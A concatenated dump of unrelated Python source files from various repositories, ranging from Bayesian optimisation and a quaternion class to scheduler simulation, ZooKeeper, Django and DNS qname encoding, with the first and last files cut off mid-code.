"actor": f"https://{settings.CP_ENDPOINT}{reverse('UserShow', kwargs={'username': target.username})}",
"object": obj
}
| 528 |
utils/src/utils/time_data.py
|
RoboHubEindhoven/suii_control
| 0 |
2170855
|
import yaml
class Time(yaml.YAMLObject):
yaml_loader = yaml.SafeLoader
yaml_tag = u'!Time'
def __init__(self, secs , nsecs):
self.secs = secs
self.nsecs = nsecs
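# Illustrative usage sketch (not part of the original module): because the class
# registers itself with yaml.SafeLoader through YAMLObject, tagged mappings can
# be loaded with yaml.safe_load and dumped back with yaml.dump.
if __name__ == "__main__":
    stamp = yaml.safe_load("!Time {secs: 12, nsecs: 500000000}")
    print(stamp.secs, stamp.nsecs)   # -> 12 500000000
    print(yaml.dump(Time(3, 250)))   # emits a !Time mapping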
| 191 |
dl_wl_imgs.py
|
HenriTEL/wedding
| 0 |
2170100
|
#!/usr/bin/env python3
"""Download images provided in wedding-list.csv"""
import csv
import subprocess
WEDDING_LIST_IMG_DIR = "static/img/wedding-list/"
WEDDING_LIST_CSV = "backend/db/wedding-list.csv"
with open(WEDDING_LIST_CSV) as csvfile:
reader = csv.reader(csvfile, quotechar='"')
next(reader)
images_urls = {row[3] for row in reader}
cmd = ['wget', '--no-clobber', '-P', WEDDING_LIST_IMG_DIR] + list(images_urls)
subprocess.run(cmd)
| 454 |
zookeeper/kazoo-update.py
|
li-ma/homework
| 0 |
2170629
|
import time
from kazoo.client import KazooClient
from kazoo.client import KazooState
import logging
logging.basicConfig()
def my_listener(state):
    if state == KazooState.LOST:
        # Register somewhere that the session was lost
        print('The session is lost: %s' % str(state))
    elif state == KazooState.SUSPENDED:
        # Handle being disconnected from Zookeeper
        print('The session is suspended: %s' % str(state))
    else:
        # Handle being connected/reconnected to Zookeeper
        print('The session is reconnected: %s' % str(state))
zk = KazooClient(hosts='127.0.0.1:2181')
zk.start()
zk.add_listener(my_listener)
# Ensure a path, create if necessary
zk.ensure_path("/dragonflow/table1")
# Determine if a node exists
if zk.exists("/dragonflow/table1/key1"):
# Do transaction
transaction = zk.transaction()
transaction.create('/dragonflow/table1/key9', b"value9")
transaction.set_data('/dragonflow/table1/key1', b"value8")
results = transaction.commit()
print(results)
result = zk.get('/dragonflow/table1/key8')
print(result[0])
| 1,079 |
cyberpunk/cyberpunk_endpoint.py
|
jonaylor89/cyberpunk
| 5 |
2170410
|
import logging
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Type
from cyberpunk.transformations import TransformationInput
from cyberpunk.transformations.concat import ConcatInput
from cyberpunk.transformations.fade_in import FadeInInput
from cyberpunk.transformations.fade_out import FadeOutInput
from cyberpunk.transformations.repeat import RepeatInput
from cyberpunk.transformations.reverse import ReverseInput
from cyberpunk.transformations.slice import SliceInput
@dataclass
class CyberpunkEndpoint:
"""
{
"audio": "celtic_pt2.mp3",
"hash": "=",
"reverse": true,
"repeat": 1,
"slice": {
"start": 1000,
"end": 5000,
}
}
"""
# path: str
audio: str
hash: str = "unsafe"
format: str = "mp3"
reverse: Optional[ReverseInput] = None
repeat: Optional[RepeatInput] = None
slice: Optional[SliceInput] = None
fade_in: Optional[FadeInInput] = None
fade_out: Optional[FadeOutInput] = None
concat: Optional[ConcatInput] = None
@classmethod
def from_req(cls, key: str, args: Dict):
endpoint = cls(audio=key, hash="unsafe")
lookup_table: Dict[str, Type[TransformationInput]] = {
"reverse": ReverseInput,
"repeat": RepeatInput,
"slice": SliceInput,
"concat": ConcatInput,
"fade_in": FadeInInput,
"fade_out": FadeOutInput,
}
supported_formats: List[str] = [
"mp3",
"wav",
"flac",
]
# Parse request args and fill corresponding fields
for (k, v) in args.items():
if k in lookup_table.keys():
logging.info(f"parsing transformation input: {k}")
parser: Type[TransformationInput] = lookup_table[k]
try:
inputs: Dict[str, Any] = parser.from_str(v)
except Exception as e:
logging.error(
f"failure to parse input `{v}` for `{k}` : {e}",
)
continue
# This only works because attributes are the same name
# as the query parameters. If that stops being the case,
# another map/lookup-table will need to be used
# i.e. setattr(endpoint, param_to_attr[k], inputs)
setattr(endpoint, k, inputs)
# default formatting is mp3
file_format = (
args["format"]
if "format" in args.keys() and args["format"] in supported_formats
else "mp3"
)
endpoint.format = file_format
return endpoint
def __repr__(self) -> str:
params = []
if self.reverse is not None:
params.append(f"reverse={self.reverse}")
if self.repeat is not None:
params.append(f"repeat={self.repeat}")
if self.slice is not None:
params.append(f"slice={self.slice}")
if self.concat is not None:
params.append(f"concat={self.concat}")
if self.fade_in is not None:
params.append(f"fade_in={self.fade_in}")
if self.fade_out is not None:
params.append(f"fade_out={self.fade_out}")
return f"/{self.audio}{('?' + '&'.join(params)) if len(params) > 0 else ''}"
    def __str__(self) -> str:
        # Identical query-string form as __repr__; delegate to avoid duplication.
        return repr(self)
| 4,076 |
process/network/find_verified_user.py
|
LiuQL2/twitter
| 1 |
2168992
|
#!/usr/bin/python env
# -*- coding: utf-8 -*-
import json
import csv
import os
import numpy as np
import time
import pandas as pd
from collections import OrderedDict
from utility.functions import get_dirlist
from utility.functions import write_log
def find_user(path_data,path_save_to,file_save_to):
file_name_list = get_dirlist(path = path_data, key_word_list=['part-r','.json','<KEY>'],no_key_word_list=['crc'])
print len(file_name_list)
time.sleep(40)
file_save = open(path_save_to + file_save_to,'wb')
file_writer = csv.writer(file_save)
print file_name_list
file_index = 0
for file_name in file_name_list:
file_index = file_index + 1
file = open(path_data + file_name, 'r')
write_log(log_file_name='find_verified_user.log',log_file_path=os.getcwd(),information='file index:' + str(file_index) + ' is being processing.')
for line in file:
try:
print len(line)
row = json.loads(line,object_pairs_hook=OrderedDict)
actor = [row['actor']['id'], row['actor']['verified'], row['actor']['preferredUsername']]
file_writer.writerow(actor)
print 'file index:', file_index, actor
if row['type'] == 'retweet':
origin_actor = [row['originActor']['id'], row['originActor']['verified'], row['originActor']['preferredUsername']]
file_writer.writerow(origin_actor)
else:
pass
except:
print file_index, '*' * 100
pass
file.close()
file_save.close()
def drop_duplicate_user(path_data,path_save_to, actor_file,all_user_file,verified_user_file):
user_dataFrame = pd.read_csv(path_data + actor_file,names = ['user_id','isverified','preferred_username'],dtype={'user_id':np.str},header=None)
user_dataFrame = user_dataFrame.drop_duplicates()
user_verified_dataFrame = user_dataFrame[user_dataFrame.isverified == True]
user_dataFrame.to_csv(path_save_to + all_user_file,index = False,header=False)
user_verified_dataFrame.to_csv(path_save_to + verified_user_file,index=False,header=False)
print 'all user:\n',user_dataFrame
print 'verified user:\n',user_verified_dataFrame
def main():
write_log(log_file_name='find_verified_user.log', log_file_path=os.getcwd(),
information='###################program start#####################.')
path_data = 'D:/LiuQL/eHealth/twitter/data/data_origin/'
path_save_to = 'D:/LiuQL/eHealth/twitter/data/data_origin/'
# path_data = '/pegasus/twitter-p-or-t-uae-201603.json.dxb/'
# path_save_to ='/pegasus/harir/Qianlong/data/network/'
duplicate_user_file = 'user_contain_duplicates.txt'
all_user_file = 'user_all.txt'
verified_user_file = 'user_verified.txt'
find_user(path_data = path_data, path_save_to = path_save_to,file_save_to=duplicate_user_file)
drop_duplicate_user(path_data = path_save_to, path_save_to = path_save_to, actor_file=duplicate_user_file,all_user_file=all_user_file,verified_user_file=verified_user_file)
write_log(log_file_name='find_verified_user.log', log_file_path=os.getcwd(),
information='###################program finished#####################.' + '\n' * 5)
main()
| 3,318 |
migrations/versions/7263a24da5fd_.py
|
originaltebas/chmembers
| 0 |
2170892
|
"""empty message
Revision ID: 7263a24da5fd
Revises: <KEY>
Create Date: 2019-06-06 16:11:22.957093
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '7263a24da5fd'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('miembros', 'hoja_firmada',
existing_type=mysql.TINYINT(display_width=1),
type_=sa.Boolean(),
existing_nullable=True)
op.add_column('reuniones', sa.Column('comentarios_culto', sa.String(length=100), nullable=True))
op.drop_column('reuniones', 'comentarios')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('reuniones', sa.Column('comentarios', mysql.VARCHAR(length=100), nullable=True))
op.drop_column('reuniones', 'comentarios_culto')
op.alter_column('miembros', 'hoja_firmada',
existing_type=sa.Boolean(),
type_=mysql.TINYINT(display_width=1),
existing_nullable=True)
# ### end Alembic commands ###
| 1,224 |
enbo/util/two_step_ei_envelope.py
|
shalijiang/bo
| 3 |
2169905
|
import torch
from botorch.models.model import Model
from botorch.acquisition.analytic import (
ExpectedImprovement,
AnalyticAcquisitionFunction,
)
from botorch.acquisition.monte_carlo import qExpectedImprovement
from torch import Tensor
from botorch.optim import optimize_acqf
from botorch.optim.initializers import gen_batch_initial_conditions
from botorch.gen import gen_candidates_torch
from botorch.sampling.samplers import (
MCSampler,
GaussHermiteSampler,
SobolQMCNormalSampler,
)
from typing import Union, Optional, Dict
from botorch.utils.transforms import t_batch_mode_transform
from botorch.acquisition import ScalarizedObjective
from botorch.acquisition.two_step_ei import qExpectedImprovementBatch
from botorch import settings
from botorch.utils.sampling import draw_sobol_samples
class TwoStepEIEnvelope(AnalyticAcquisitionFunction):
def __init__(
self,
model: Model,
best_f: Union[float, Tensor],
bounds: Tensor,
sampler: Optional[MCSampler] = None,
inner_sampler: Optional[MCSampler] = None,
q1: Optional[int] = 1,
options: Optional[Dict[str, Union[bool, float, int, str]]] = {},
objective: Optional[ScalarizedObjective] = None,
maximize: bool = True,
) -> None:
r"""Two-step Expected Improvement based on:
Wu & Frazier, Practical Two-Step Lookahead Bayesian Optimization, NeurIPS 2019.
Args:
model: A fitted single-outcome model.
best_f: Either a scalar or a `b`-dim Tensor (batch mode) representing
the best function value observed so far (assumed noiseless).
bounds: a 2 x d tensor specifying the range of each dimension
sampler: used to sample y from its posterior
q1: int, batch size of the second step
objective: A ScalarizedObjective (optional).
maximize: If True, consider the problem a maximization problem.
"""
super().__init__(model=model, objective=objective)
self.maximize = maximize
if not torch.is_tensor(best_f):
best_f = torch.tensor(best_f)
self.register_buffer("best_f", best_f)
self.bounds = bounds
self.sampler = sampler
self.inner_sampler = inner_sampler or SobolQMCNormalSampler(num_samples=512)
self.q1 = q1
self.options = options
@t_batch_mode_transform(expected_q=1)
def forward(self, X: Tensor) -> Tensor:
r"""Evaluate Two-Step EI on the candidate set X.
Args:
X: A `b1 x ... bk x 1 x d`-dim batched tensor of `d`-dim design points.
Expected Improvement is computed for each point individually,
i.e., what is considered are the marginal posteriors, not the
joint.
Returns:
A `b1 x ... bk`-dim tensor of Expected Improvement values at the
given design points `X`.
"""
acq_func = ExpectedImprovement(model=self.model, best_f=self.best_f)
immediate_utility = acq_func(X)
if self.q1 == 0:
return immediate_utility
if X.dim() < 3:
X = X.unsqueeze(0)
batch_size, q, d = X.shape
fantasy_model = self.model.fantasize(
X=X, sampler=self.sampler, observation_noise=True
)
best_f = fantasy_model.train_targets.max(dim=-1)[0]
# assume _sample_shape=torch.Size([num_samples])
num_fantasies = self.sampler.sample_shape[0]
with torch.enable_grad():
if self.q1 == 1: # two-step, use analytic EI
value_function = ExpectedImprovement(model=fantasy_model, best_f=best_f)
else:
value_function = qExpectedImprovement(
model=fantasy_model, sampler=self.inner_sampler, best_f=best_f
)
def joint_value_function(X):
# X reshape to batch_shape x fantasies x batch_size x q x d
batch_size_joint = X.shape[0]
X_prime = X.view(
batch_size_joint, num_fantasies, batch_size, self.q1, d
)
# values: batch_size_joint x num_fantasies x batch_size
values = value_function(X_prime)
return values.sum(tuple(range(1, len(values.shape))))
joint_optim_size = num_fantasies * batch_size * self.q1
# can tune num_restarts, raw_samples, and maxiter to tradeoff efficiency and accuracy
num_restarts = 20
seed = self.options.get("seed", 0)
method = self.options.get("method", "scipy")
if method == "scipy": # by default L-BFGS-B is used
num_batches = self.options.get("num_batches", 5)
X_fantasies, _ = optimize_acqf(
acq_function=joint_value_function,
bounds=self.bounds,
q=joint_optim_size,
num_restarts=num_restarts,
raw_samples=512,
options={
"maxiter": 500,
"seed": seed,
"batch_limit": round(num_restarts / num_batches),
},
)
elif method == "torch" or method == "sgd": # by default Adam is used
bounds = self.bounds
Xinit = gen_batch_initial_conditions(
acq_function=joint_value_function,
bounds=bounds,
q=joint_optim_size,
num_restarts=50,
raw_samples=1000,
options={
"nonnegative": True,
"seed": self.options.get("seed", None),
},
)
# Xinit = draw_sobol_samples(bounds=bounds, n=100, q=joint_optim_size, seed=self.options.get("seed", None))
optimizer = torch.optim.SGD if method == "sgd" else torch.optim.Adam
batch_candidates, batch_acq_values = gen_candidates_torch(
initial_conditions=Xinit,
acquisition_function=joint_value_function,
lower_bounds=bounds[0],
upper_bounds=bounds[1],
optimizer=optimizer,
options={
"maxiter": 500,
"lr": 1.0,
"scheduler_on": True,
"gamma": 0.7,
},
# options={"maxiter": 300},
verbose=False,
)
best = torch.argmax(batch_acq_values.view(-1), dim=0)
X_fantasies = batch_candidates[best].detach()
X_fantasies = X_fantasies.view(num_fantasies, batch_size, self.q1, d)
with settings.propagate_grads(True):
values = value_function(X_fantasies)
if isinstance(self.sampler, GaussHermiteSampler):
weighted_values = values * self.sampler.base_weights
future_utility = torch.sum(weighted_values, dim=0)
else:
future_utility = values.mean(dim=0)
return immediate_utility + future_utility
| 7,281 |
ELDAmwl/backscatter/common/calibration/params.py
|
actris-scc/ELDAmwl
| 1 |
2167849
|
from addict import Dict
from ELDAmwl.bases.base import Params
from ELDAmwl.component.interface import IDBFunc
from ELDAmwl.output.mwl_file_structure import MWLFileStructure
from ELDAmwl.output.mwl_file_structure import MWLFileVarsFromDB
from zope.component import queryUtility
class BscCalibrationParams(Params):
def __init__(self):
super(BscCalibrationParams, self).__init__()
self.cal_range_search_algorithm = None
        self.window_width = None
self.cal_value = None
self.cal_interval = Dict({'min_height': None,
'max_height': None})
@classmethod
def from_db(cls, general_params):
result = cls()
db_func = queryUtility(IDBFunc)
query = db_func.get_bsc_cal_params_query(general_params.prod_id, general_params.product_type)
result.cal_range_search_algorithm = \
query.BscCalibrOption.calRangeSearchMethod_ID
result.window_width = \
float(query.BscCalibrOption.WindowWidth)
result.cal_value = \
float(query.BscCalibrOption.calValue)
result.cal_interval['min_height'] = \
float(query.BscCalibrOption.LowestHeight)
result.cal_interval['max_height'] = \
float(query.BscCalibrOption.TopHeight)
return result
def equal(self, other):
result = True
if (self.cal_interval.min_height != other.cal_interval.min_height) or \
(self.cal_interval.max_height != other.cal_interval.max_height) or \
(self.window_width != other.window_width) or \
(self.cal_value != other.cal_value) or \
(self.cal_range_search_algorithm != other.cal_range_search_algorithm):
result = False
return result
def to_meta_ds_dict(self, dct):
"""
writes parameter content into Dict for further export in mwl file
Args:
dct (addict.Dict): is a dict which will be converted into dataset.
has the keys 'attrs' and 'data_vars'
Returns:
"""
mwl_struct = MWLFileStructure()
mwl_vars = MWLFileVarsFromDB()
dct.data_vars.calibration_range_search_algorithm = \
mwl_vars.bsc_calibr_method_var(self.cal_range_search_algorithm)
dct.data_vars.calibration_search_range = mwl_struct.cal_search_range_var(self.cal_interval)
dct.data_vars.calibration_value = mwl_struct.bsc_calibr_value_var(self.cal_value)
| 2,512 |
machine-learning/solution/ml-classifiers-own.py
|
giserh/book-python
| 1 |
2168324
|
from sklearn import metrics
from scipy.spatial.distance import euclidean as euclidean_distance
from sklearn.model_selection import train_test_split
from sklearn import datasets
class NearestNeighborClassifier:
def fit(self, features, labels):
self.features_train = features
self.labels_train = labels
def predict(self, features_test):
predictions = []
for row in features_test:
label = self._closest(row)
predictions.append(label)
return predictions
def _closest(self, row):
current_best_dist = euclidean_distance(row, self.features_train[0])
best_index = 0
for i in range(0, len(self.features_train)):
dist = euclidean_distance(row, self.features_train[i])
if dist < current_best_dist:
current_best_dist = dist
best_index = i
return self.labels_train[best_index]
dataset = datasets.load_iris()
features = dataset.data
labels = dataset.target
data = train_test_split(features, labels, test_size=0.25, random_state=0)
features_train = data[0]
features_test = data[1]
labels_train = data[2]
labels_test = data[3]
model = NearestNeighborClassifier()
model.fit(features_train, labels_train)
predictions = model.predict(features_test)
accuracy = metrics.accuracy_score(labels_test, predictions)
print(accuracy)
| 1,384 |
worker/notification/task/update_push_result.py
|
pjongy/jraze
| 5 |
2168886
|
import deserialize
from common.logger.logger import get_logger
from common.structure.job.messaging import DevicePlatform
from common.structure.job.notification import NotificationSentResultMessageArgs
from worker.notification.external.jraze.jraze import JrazeApi
from worker.notification.task import AbstractTask
logger = get_logger(__name__)
class UpdatePushResultTask(AbstractTask):
def __init__(self, jraze_api: JrazeApi):
self.jraze_api: JrazeApi = jraze_api
async def run(self, kwargs: dict):
task_args: NotificationSentResultMessageArgs = deserialize.deserialize(
NotificationSentResultMessageArgs, kwargs)
if task_args.device_platform == DevicePlatform.IOS:
await self.jraze_api.increase_notification_sent(
notification_uuid=task_args.notification_uuid,
ios=task_args.sent,
)
elif task_args.device_platform == DevicePlatform.Android:
await self.jraze_api.increase_notification_sent(
notification_uuid=task_args.notification_uuid,
android=task_args.sent,
)
| 1,133 |
lab6/simulator.py
|
aostrun/RTC-Demos
| 0 |
2169552
|
import sys
from task import Task, Scheduler
from schedulers import *
# Constants
RMPA_STR = 'RMPA'
EDF_STR = 'EDF'
LLF_STR = 'LLF'
SCHED_STR = 'SCHED'
OPCE_STR = 'OPCE'
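# Illustrative input layout (inferred from the parsing below, not shipped with
# the original script): the first line gives the mode, the simulation length
# and, for LLF/SCHED, the scheduling period; every further line describes one
# task. For example, a SCHED run with two round-robin tasks could look like
#   SCHED 100 2
#   10 3 1 RR
#   20 5 2 RR
# while RMPA/EDF task lines only need "<period> <duration>".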
if(len(sys.argv) <= 1):
print("Please provide input file!")
exit(1)
elif(len(sys.argv) > 2):
print("Too many arguments provided!")
exit(1)
filename = sys.argv[1]
# Read lines from input file
with open(filename, 'r') as file:
lines = file.readlines()
# There has to be at least 2 lines in the input file
if(len(lines) < 2):
print("Invalid file...")
exit(1)
# Split the first line and check simulator metadata
#print(lines[0].split(' '))
info_split = lines[0].split()
# Parse task data from input file
tasks = list()
for i in range(1, len(lines)):
#print(lines[i])
if info_split[0] == OPCE_STR:
task_split = lines[i].split(' ')
task_id = int(task_split[0])
task_duration = int(task_split[1])
task = Task(task_id, 10000, task_duration)
task.next_start = 100000
new_list = list()
for k in range(2, len(task_split)):
new_list.append(int(task_split[k]))
task.wait = new_list
else:
task_split = lines[i].split(' ')
task_period = int(task_split[0])
task_duration = int(task_split[1])
if info_split[0] == SCHED_STR:
task_prio = int(task_split[2])
task_sched_type = task_split[3].rstrip()
task = Task(i, task_period, task_duration, task_prio, task_sched_type)
if task_sched_type == "RR":
task.rr_remaining = int(info_split[2])
task.rr_period = task.rr_remaining
else:
task = Task(i, task_period, task_duration)
tasks.append(task)
#print(task_period.__str__() + ":" + task_duration.__str__())
scheduler = Scheduler(tasks)
if info_split[0] == LLF_STR or info_split[0] == SCHED_STR:
task_period = int(info_split[2])
scheduler.period = task_period
#
if(info_split[0] == RMPA_STR):
print("RMPA Mode")
rmpa_duration = int(info_split[1])
# Run RMPA simulation
rmpa(rmpa_duration, scheduler)
elif(info_split[0] == EDF_STR):
print("EDF Mode")
edf_duration = int(info_split[1])
# Run EDF simulation
edf(edf_duration, scheduler)
elif(info_split[0] == LLF_STR):
print("LLF Mode")
llf_duration = int(info_split[1])
llf_period = int(info_split[2])
# Run LLF simulation
llf(llf_duration, llf_period, scheduler)
elif(info_split[0] == SCHED_STR):
print("SCHED Mode")
# Run SCHED simulation
sched_duration = int(info_split[1])
sched_period = int(info_split[2])
# Run LLF simulation
sched(sched_duration, sched_period, scheduler)
elif(info_split[0] == OPCE_STR):
opce(160, scheduler)
"""
for task in tasks:
print(task)
for w in task.wait:
print(w)
"""
else:
print("Mode not supported!")
exit(1)
print("Simulation Done!\n")
| 2,974 |
Cadastro de Produtos/clientes/forms/pedido_forms.py
|
Drack112/Treina-Web-Django
| 0 |
2170722
|
from django import forms
from ..models import Pedido, Cliente, Produto
class PedidoForm(forms.ModelForm):
cliente = forms.ModelChoiceField(queryset=Cliente.objects.all())
produtos = forms.ModelMultipleChoiceField(queryset=Produto.objects.all())
class Meta:
model = Pedido
fields = [
"cliente",
"observacoes",
"data_pedido",
"valor",
"status",
"produtos",
]
| 468 |
rdl/column_transformers/StringTransformers.py
|
pageuppeople-opensource/relational-data-loader
| 2 |
2170553
|
class ToUpper:
@staticmethod
def execute(text_in):
x = text_in.upper()
return x
class TrimWhiteSpace:
@staticmethod
def execute(text_in):
return text_in.strip()
| 203 |
scripts/measure_dir.py
|
HReynaud/Morpho-MNIST
| 0 |
2167009
|
import argparse
import multiprocessing
import os
from morphomnist import io, measure
def measure_dir(data_dir, pool):
for name in ['t10k', 'train']:
in_path = os.path.join(data_dir, name + "-images-idx3-ubyte.gz")
out_path = os.path.join(data_dir, name + "-morpho.csv")
print(f"Processing MNIST data file {in_path}...")
data = io.load_idx(in_path)
df = measure.measure_batch(data, pool=pool, chunksize=100)
df.to_csv(out_path, index_label='index')
print(f"Morphometrics saved to {out_path}")
def main(data_dirs):
with multiprocessing.Pool() as pool:
for data_dir in data_dirs:
measure_dir(data_dir, pool)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Morpho-MNIST - Measure an image directory")
parser.add_argument('datadirs', nargs='+',
help="one or more MNIST image directories to measure")
args = parser.parse_args()
print(args.datadirs)
assert all(os.path.exists(data_dir) for data_dir in args.datadirs)
main(args.datadirs)
| 1,096 |
quaternion/quat.py
|
IhorNehrutsa/micropython-samples
| 268 |
2168504
|
# quat.py "Micro" Quaternion class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2020 <NAME>
from math import sqrt, sin, cos, acos, isclose, asin, atan2, pi
from array import array
mdelta = 0.001 # 0.1% Minimum difference considered significant for graphics
adelta = 0.001 # Absolute tolerance for components near 0
def _arglen(arg):
length = 0
try:
length = len(arg)
except TypeError:
pass
if length not in (0, 3, 4):
raise ValueError('Sequence length must be 3 or 4')
return length
# Convert a rotation quaternion to Euler angles. Beware:
# https://github.com/moble/quaternion/wiki/Euler-angles-are-horrible
def euler(q): # Return (heading, pitch, roll)
if not q.isrot():
raise ValueError('Must be a rotation quaternion.')
w, x, y, z = q
pitch = asin(2*(w*y - x*z))
if isclose(pitch, pi/2, rel_tol = mdelta):
return -2 * atan2(x, w), pitch, 0
if isclose(pitch, -pi/2, rel_tol = mdelta):
return 2 * atan2(x, w), pitch, 0
roll = atan2(2*(w*x + y*z), w*w - x*x - y*y + z*z)
#roll = atan2(2*(w*x + y*z), 1 - 2*(x*x + y*y))
hdg = atan2(2*(w*z + x*y), w*w + x*x - y*y - z*z)
#hdg = atan2(2*(w*z + x*y), 1 - 2 *(y*y + z*z))
return hdg, pitch, roll
class Quaternion:
def __init__(self, w=1, x=0, y=0, z=0): # Default: the identity quaternion
self.d = array('f', (w, x, y, z))
@property
def w(self):
return self[0]
@w.setter
def w(self, v):
self[0] = v
@property
def x(self):
return self[1]
@x.setter
def x(self, v):
self[1] = v
@property
def y(self):
return self[2]
@y.setter
def y(self, v):
self[2] = v
@property
def z(self):
return self[3]
@z.setter
def z(self, v):
self[3] = v
def normalise(self):
if self[0] == 1: # acos(1) == 0. Identity quaternion: no rotation
return Quaternion(1, 0, 0, 0)
m = abs(self) # Magnitude
assert m > 0.1 # rotation quaternion should have magnitude ~= 1
if isclose(m, 1.0, rel_tol=mdelta):
return self # No normalisation necessary
return Quaternion(*(a/m for a in self))
def __getitem__(self, key):
return self.d[key]
def __setitem__(self, key, v):
try:
v1 = array('f', v)
except TypeError: # Scalar
v1 = v
self.d[key] = v1
def copy(self):
return Quaternion(*self)
def __abs__(self): # Return magnitude
return sqrt(sum((d*d for d in self)))
def __len__(self):
return 4
# Comparison: == and != perform equality test of all elements
def __eq__(self, other):
return all((isclose(a, b, rel_tol=mdelta, abs_tol=adelta) for a, b in zip(self, other)))
def __ne__(self, other):
return not self == other
# < and > comparisons compare magnitudes.
def __gt__(self, other):
return abs(self) > abs(other)
def __lt__(self, other):
return abs(self) < abs(other)
# <= and >= return True for complete equality otherwise magnitudes are compared.
def __ge__(self, other):
return True if self == other else abs(self) > abs(other)
def __le__(self, other):
return True if self == other else abs(self) < abs(other)
def to_angle_axis(self):
q = self.normalise()
if isclose(q[0], 1.0, rel_tol = mdelta):
return 0, 1, 0, 0
theta = 2*acos(q[0])
s = sin(theta/2)
return [theta] + [a/s for a in q[1:]]
def conjugate(self):
return Quaternion(self[0], *(-a for a in self[1:]))
def inverse(self): # Reciprocal
return self.conjugate()/sum((d*d for d in self))
def __str__(self):
return 'w = {:4.2f} x = {:4.2f} y = {:4.2f} z = {:4.2f}'.format(*self)
def __pos__(self):
return Quaternion(*self)
def __neg__(self):
return Quaternion(*(-a for a in self))
def __truediv__(self, scalar):
if isinstance(scalar, Quaternion): # See docs for reason
raise ValueError('Cannot divide by Quaternion')
return Quaternion(*(a/scalar for a in self))
def __rtruediv__(self, other):
return self.inverse() * other
# Multiply by quaternion, list, tuple, or scalar: result = self * other
def __mul__(self, other):
if isinstance(other, Quaternion):
w1, x1, y1, z1 = self
w2, x2, y2, z2 = other
w = w1*w2 - x1*x2 - y1*y2 - z1*z2
x = w1*x2 + x1*w2 + y1*z2 - z1*y2
y = w1*y2 - x1*z2 + y1*w2 + z1*x2
z = w1*z2 + x1*y2 - y1*x2 + z1*w2
return Quaternion(w, x, y, z)
length = _arglen(other)
if length == 0: # Assume other is scalar
return Quaternion(*(a * other for a in self))
elif length == 3:
return Quaternion(0, *(a * b for a, b in zip(self[1:], other)))
# length == 4:
return Quaternion(*(a * b for a, b in zip(self, other)))
def __rmul__(self, other):
return self * other # Multiplication by scalars and tuples is commutative
def __add__(self, other):
if isinstance(other, Quaternion):
return Quaternion(*(a + b for a, b in zip(self, other)))
length = _arglen(other)
if length == 0: # Assume other is scalar
return Quaternion(self[0] + other, *self[1:]) # ? Is adding a scalar meaningful?
elif length == 3:
return Quaternion(0, *(a + b for a, b in zip(self[1:], other)))
# length == 4:
return Quaternion(*(a + b for a, b in zip(self, other)))
def __radd__(self, other):
return self.__add__(other)
def __sub__(self, other):
if isinstance(other, Quaternion):
return Quaternion(*(a - b for a, b in zip(self, other)))
length = _arglen(other)
if length == 0: # Assume other is scalar
return Quaternion(self[0] - other, *self[1:]) # ? Is this meaningful?
elif length == 3:
return Quaternion(0, *(a - b for a, b in zip(self[1:], other)))
# length == 4:
return Quaternion(*(a - b for a, b in zip(self, other)))
def __rsub__(self, other):
return other + self.__neg__() # via __radd__
def isrot(self):
return isclose(abs(self), 1.0, rel_tol = mdelta)
def isvec(self):
return isclose(self[0], 0, abs_tol = adelta)
def __matmul__(self, rot):
return rot * self * rot.conjugate()
def rrot(self, rot):
return rot.conjugate() * self * rot
# A vector quaternion has real part 0. It can represent a point in space.
def Vector(x, y, z):
return Quaternion(0, x, y, z)
Point = Vector
# A rotation quaternion is a unit quaternion i.e. magnitude == 1
def Rotator(theta=0, x=0, y=0, z=0):
s = sin(theta/2)
m = sqrt(x*x + y*y + z*z) # Convert to unit vector
if m > 0:
return Quaternion(cos(theta/2), s*x/m, s*y/m, s*z/m)
else:
return Quaternion(1, 0, 0, 0) # Identity quaternion
def Euler(heading, pitch, roll):
    cy = cos(heading * 0.5)
    sy = sin(heading * 0.5)
    cp = cos(pitch * 0.5)
    sp = sin(pitch * 0.5)
    cr = cos(roll * 0.5)
    sr = sin(roll * 0.5)
    w = cr * cp * cy + sr * sp * sy
    x = sr * cp * cy - cr * sp * sy
    y = cr * sp * cy + sr * cp * sy
    z = cr * cp * sy - sr * sp * cy
return Quaternion(w, x, y, z) # Tait-Bryan angles but z == towards sky
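if __name__ == "__main__":
    # Illustrative sketch (not part of the original module): rotating the point
    # (1, 0, 0) by 90 degrees about the z axis with the @ operator defined above
    # should give (approximately) the point (0, 1, 0).
    p = Point(1, 0, 0)
    rot = Rotator(pi / 2, 0, 0, 1)
    print(p @ rot)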
| 7,557 |
GUItest.py
|
migzpogi/PokerCalculator
| 4 |
2170595
|
from flask import Flask, render_template, request
app = Flask(__name__)
app.debug = True
@app.route('/', methods=['GET'])
def dropdown():
colours = ['Red', 'Blue', 'Black', 'Orange']
return render_template('test.html', colours=colours)
if __name__ == "__main__":
app.run()
| 287 |
shared/qpg_defaults.py
|
byu-imaal/dns-cookies-pam21
| 0 |
2170281
|
"""Default QnameComponent extensions that are included in the base QueryParserGenerator class"""
import base64
import binascii
import random
import socket
import string
import struct
import time
from shared.qpg_component_base import QnameComponent
class QnameKeyword(QnameComponent):
id = "$key"
exceptions = []
@classmethod
def generate(cls, val) -> str:
return str(val)
class QnameIP(QnameComponent):
id = "$ip"
exceptions = [socket.error, binascii.Error, OSError]
@classmethod
def generate(cls, ip_addr):
if ':' in ip_addr:
return base64.b32encode(socket.inet_pton(socket.AF_INET6, ip_addr))[:-6].lower().decode()
else:
return base64.b32encode(socket.inet_pton(socket.AF_INET, ip_addr))[:-1].lower().decode()
@classmethod
def parse(cls, label):
if len(label) > 7:
return socket.inet_ntop(socket.AF_INET6, base64.b32decode('{}======'.format(label).upper()))
else:
return socket.inet_ntop(socket.AF_INET, base64.b32decode('{}='.format(label).upper()))
class QnameTimestamp(QnameComponent):
id = "$ts"
exceptions = [binascii.Error, struct.error]
@classmethod
def generate(cls, timestamp: float = None) -> str:
if timestamp is None:
timestamp = time.time()
return base64.b32encode(struct.pack(">I", int(timestamp)))[:-1].lower().decode()
@classmethod
def parse(cls, label: str) -> int:
return struct.unpack('>I', base64.b32decode(label + '=', casefold=True))[0]
class QnameMicroSeconds(QnameComponent):
id = "$tsu"
exceptions = []
@classmethod
def generate(cls, timestamp: float = None) -> str:
